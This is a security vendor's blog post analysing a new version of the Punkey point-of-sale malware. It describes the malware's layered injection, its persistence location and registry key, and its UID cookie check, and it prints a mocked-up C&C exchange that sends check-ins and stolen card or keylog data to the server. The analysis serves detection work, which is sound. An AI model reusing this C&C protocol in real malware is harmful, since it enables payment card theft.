Connect with our team of offensive security, AI security and pen testing experts at Black Hat Europe 2023. Learn More

Connect with our team of offensive security, AI security and pen testing experts at Black Hat Europe 2023. Learn More

Managed Detection & Response

Eradicate cyberthreats with world-class intel and expertise

Managed Security Services

Expand your team’s capabilities and strengthen your security posture

Consulting & Professional Services

Tap into our global team of tenured cybersecurity specialists

Penetration Testing

Subscription- or project-based testing, delivered by global experts

Database Security

Get ahead of database risk, protect data and exceed compliance requirements

Email Security & Management

Catch email threats others miss with layered security & maximum control

Co-Managed SOC (SIEM)

Eliminate alert fatigue, focus your SecOps team, stop threats fast, and reduce cyber risk

Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
The Trustwave Approach
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Platform
SpiderLabs Fusion Center
Security Operations Centers
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
SpiderLabs Blog

New Episode of Punkey PoS Malware Airs

Reruns from the 1980s are all the rage these days, and like the sitcom it's based on, we've encountered a second run from the Punkey Point of Sale malware as part of an investigation we're working on with the FBI. In April, we detailed three versions of Punkey that you can read about here. The new version follows pretty much the same plot with a few additions I will talk about here.



  • Version: 2015-02-10
  • Compile Date: 2015-02-10
  • SHA-256: 6d78550d140061607557bac7c9ba70787e9589b200758f4ab8d59f6504bb7563


  • Compile Date: 2015-02-04
  • SHA-256: bc07262b062e6a4b5b9f38d71a961299a014c4da6c7d63c91dd285994fb3d790

Command and Control (C&C)

This version of Punkey uses a larger list of C&C servers than previous versions. Like it did in previous versions, Punkey will try each server in the list one at a time until a response is received.



All the World's a Stage

Previous versions of Punkey used a two-stage approach that decoded the Punkey binary and injected it into explorer.exe. The latest version adds an additional stage written in Delphi, which is a programming language favored by many malware authors. This additional stage decodes obfuscated shell code that is responsible for mapping the Punkey injector into memory. A new process is created, the injector is mapped into memory and execution is passed to it. The injector operates exactly the same as previous versions, which eventually injects Punkey into explorer.exe. My previous post on Punkey discusses the details of this process along with diagrams for clarity.

New Functionality

Most of the latest version remains the same as previous versions with some new functionality introduced to ensure that the malware is talking to an authentic C&C server. As before, the binary is copied to %USERPROFILE%\Local Settings\Application Data\jusched\jusched.exe and persistence is added to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. Before performing the initial check-in with the server, Punkey checks to see if a file called cookie exists in the jusched directory. If the file exists it is read into memory and stored in a global variable that is used in future communication with the C&C server. If the file does not exist, a GET request is sent to the C&C server:

GET /21kjn2bkhjv/?action=getuid HTTP/1.1

The response from the server must match the string: 'uid-' and be five-or-more characters long. If these criteria are met the cookie file is created in the jusched directory and the UID is written to it. If there is no response from the server or either of the requirements is not met, the malware will try the next C&C server in the list. The UID that has been seen in the wild was composed of 13 hex characters, however we can't share it since it is part of an investigation. It is unknown at this point how the server generates the UID. This diagram depicts the cookie creation logic flow:



Communication between Punkey and the C&C servers is slightly different than previous versions. Here is a breakdown of the 2015-02-10 version communicating with a "fake" C&C server that I mocked up:

Note: All communication is local and the track data is faked but passes luhn checks

# After install, Punkey finds it does not have a UID, so one is requested from the server

[GET /21kjn2bkhjv/] action=getuid


# The UID is retrieved and Punkey checks in with the clients' information

[GET /21kjn2bkhjv/] action=sendinfo&uid=uid-fakeuid&bit=32&version=2015-02-10


# Alerts the server to an action

[POST /21kjn2bkhjv/index.php] action=key&uid=uid-fakeuid&key=RUN


# Checks the server to see if any updates are available

[GET /21kjn2bkhjv/] action=getupdate&uid=uid-fakeuid


# Alert the server that CHD scanning has begun

[GET /21kjn2bkhjv/] action=sendinfo&uid=uid-fakeuid&bit=32&version=2015-02-10

[POST /21kjn2bkhjv/index.php] action=key&uid=uid-fakeuid&key=SCANNING


# Report found CHD or keylogger data to server

[GET /21kjn2bkhjv/] action=sendinfo&uid=uid-fakeuid&bit=32&version=2015-02-10

[POST /21kjn2bkhjv/index.php] action=unkey&uid=uid-fakeuid&unkey=NzzN7lzPPhJY13IwOVsVRGTECxRJcZpuh585JLMRGhi708RLW6lf%2BQzZpfF2yvS9


The encryption remains the same and can still be decrypted using our Ruby script, which can be found here. The previously posted yara rules will still find Punkey running in memory.


The author(s) of Punkey have taken steps to improve the malware by adding an obfuscation layer to hinder analysis, and a management layer that allows for easier widespread deployment. When taking into account the three previous versions of Punkey, there is a clear pattern of continued and active development by the author(s) over the last several months. To help combat this current threat, we've identified and outlined the changes in the most recent Punkey version as well as provided the community with a number of tools to facilitate detection and ease the burden of analysis. Happy Hunting!

Latest SpiderLabs Blogs

The 2023 Retail Services Sector Threat Landscape: A Trustwave Threat Intelligence Briefing

The annual holiday shopping season is poised for a surge in spending, a fact well-known to retailers, consumers, and cybercriminals alike. The latter group, however, is poised to exploit any...

Read More

Pwning Electroencephalogram (EEG) Medical Devices by Default

Overall Analysis of Vulnerability Identification – Default Credentials Leading to Remote Code Execution During internal network testing, a document was discovered titled the “XL Security Site...

Read More

Hidden Data Exfiltration Using Time, Literally

I was looking at my watch last week and my attention was moved towards the seconds over at the right of the watch face, incrementing nicely along as you’d expect. Now, I don’t know if I’d just spent...

Read More